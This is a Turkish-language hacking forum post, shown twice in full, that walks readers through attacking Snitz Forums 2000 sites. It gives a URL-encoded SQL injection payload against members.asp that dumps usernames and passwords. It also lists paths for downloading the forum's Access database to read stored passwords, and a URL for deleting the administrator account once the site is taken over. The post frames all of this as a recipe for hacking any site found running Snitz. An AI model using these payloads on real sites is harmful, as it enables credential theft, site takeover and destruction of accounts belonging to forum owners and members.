Snitz Forum Açığı
Arkadaşlar bildiğiniz gibi bazı snitz forumlarının açığı var:
1)kendimize snitz kullanan bir site buluyoruz:
http://www.hedefforum.com/forum/
2)O forumun bulunduğu bölüme şu kodları ekliyoruz:
members.asp?mode=search& M_NAME=Ace%25\')%20UNION%
20SELECT%20MEMBER_ID,%20M_STATUS,%20M_NAME%
20%
2B%20 \'/\'%20%2B%20M_PASSWORD%20%2B%20\'/ \',%20M_LEVEL,%20M_EMAIL,%20M_COUNTRY,%20M_HOMEPAGE,%
20M_ICQ,%20M_YAHOO,%20M _AIM,%20M_TITLE,%20M_POSTS,%20M_LASTPOSTDATE,%20M_LASTHEREDATE,%
20M_DATE,%2 0M_STATE%20FROM%20FORUM_MEMBERS%
20WHERE%20(M_NAME%20LIKE%20\'&initial=1&method=
3)Kullanıcı Adları&Şifre olarak karşımıza çıkıyor.
Not:Bu açık eskiden beri oldugu için bazı siteler
Not 2 : Çıkınca Admini Silin Yoksa Aynı Yöntemle Alır
Bilindigi gibi snitz forumda birçok açık var bunlardan ilki çok kullanıcının çanını yaktı.
Yine aynı snitz forumda ikinci bir açık bulundu buda database açıgı.
Kullanımına gelince http://www.hedefserver.com/forum/snitz_forums_2000.mdb veya
http://www.hedefserver.com/forum/tools/snitz_forums_2000.mdb Bu url\'ler degişebilir ama genelde böyledir.
Siz kendi forumunuzda mutlaka dosya isimlerini degiştirin.
Eger url çalışırsa direk database dosyasını download edersiniz. İndirdiginiz dosyayıda Ms Access ile açarsınız şifreler elinizde.
Evet diyelim admin şifresini aldınız ve forumu hacklediniz ama forumda açık oldugu sürece başkalarıda forumu hackleyebilir. Bunu engellemek için admini silecegiz nasılmı...
http://www.hedefserver.com/forum/pop_delet...ber&MEMBER_ID=1 Evet genelde admin uzantısı böyledir. Sondaki 1 admin ID numarasını
gösterir forumlara genelde ilk admin olarak login olundugu için
admin nosunu 1 olarak kabul ettim.
Ama eger farklı bir numara ise bunu forumun members kısmında adminin üzerine mause ile geldiginizde status barda ID yi görebilirsiniz.
Teşekkürünüzü Esirgemeyin
Arkadaşlar bildiğiniz gibi bazı snitz forumlarının açığı var:
1)kendimize snitz kullanan bir site buluyoruz:
http://www.hedefforum.com/forum/
2)O forumun bulunduğu bölüme şu kodları ekliyoruz:
members.asp?mode=search& M_NAME=Ace%25\')%20UNION%
20SELECT%20MEMBER_ID,%20M_STATUS,%20M_NAME%
20%
2B%20 \'/\'%20%2B%20M_PASSWORD%20%2B%20\'/ \',%20M_LEVEL,%20M_EMAIL,%20M_COUNTRY,%20M_HOMEPAGE,%
20M_ICQ,%20M_YAHOO,%20M _AIM,%20M_TITLE,%20M_POSTS,%20M_LASTPOSTDATE,%20M_LASTHEREDATE,%
20M_DATE,%2 0M_STATE%20FROM%20FORUM_MEMBERS%
20WHERE%20(M_NAME%20LIKE%20\'&initial=1&method=
3)Kullanıcı Adları&Şifre olarak karşımıza çıkıyor.
Not:Bu açık eskiden beri oldugu için bazı siteler
Not 2 : Çıkınca Admini Silin Yoksa Aynı Yöntemle Alır
Bilindigi gibi snitz forumda birçok açık var bunlardan ilki çok kullanıcının çanını yaktı.
Yine aynı snitz forumda ikinci bir açık bulundu buda database açıgı.
Kullanımına gelince http://www.hedefserver.com/forum/snitz_forums_2000.mdb veya
http://www.hedefserver.com/forum/tools/snitz_forums_2000.mdb Bu url\'ler degişebilir ama genelde böyledir.
Siz kendi forumunuzda mutlaka dosya isimlerini degiştirin.
Eger url çalışırsa direk database dosyasını download edersiniz. İndirdiginiz dosyayıda Ms Access ile açarsınız şifreler elinizde.
Evet diyelim admin şifresini aldınız ve forumu hacklediniz ama forumda açık oldugu sürece başkalarıda forumu hackleyebilir. Bunu engellemek için admini silecegiz nasılmı...
http://www.hedefserver.com/forum/pop_delet...ber&MEMBER_ID=1 Evet genelde admin uzantısı böyledir. Sondaki 1 admin ID numarasını
gösterir forumlara genelde ilk admin olarak login olundugu için
admin nosunu 1 olarak kabul ettim.
Ama eger farklı bir numara ise bunu forumun members kısmında adminin üzerine mause ile geldiginizde status barda ID yi görebilirsiniz.
Teşekkürünüzü Esirgemeyin
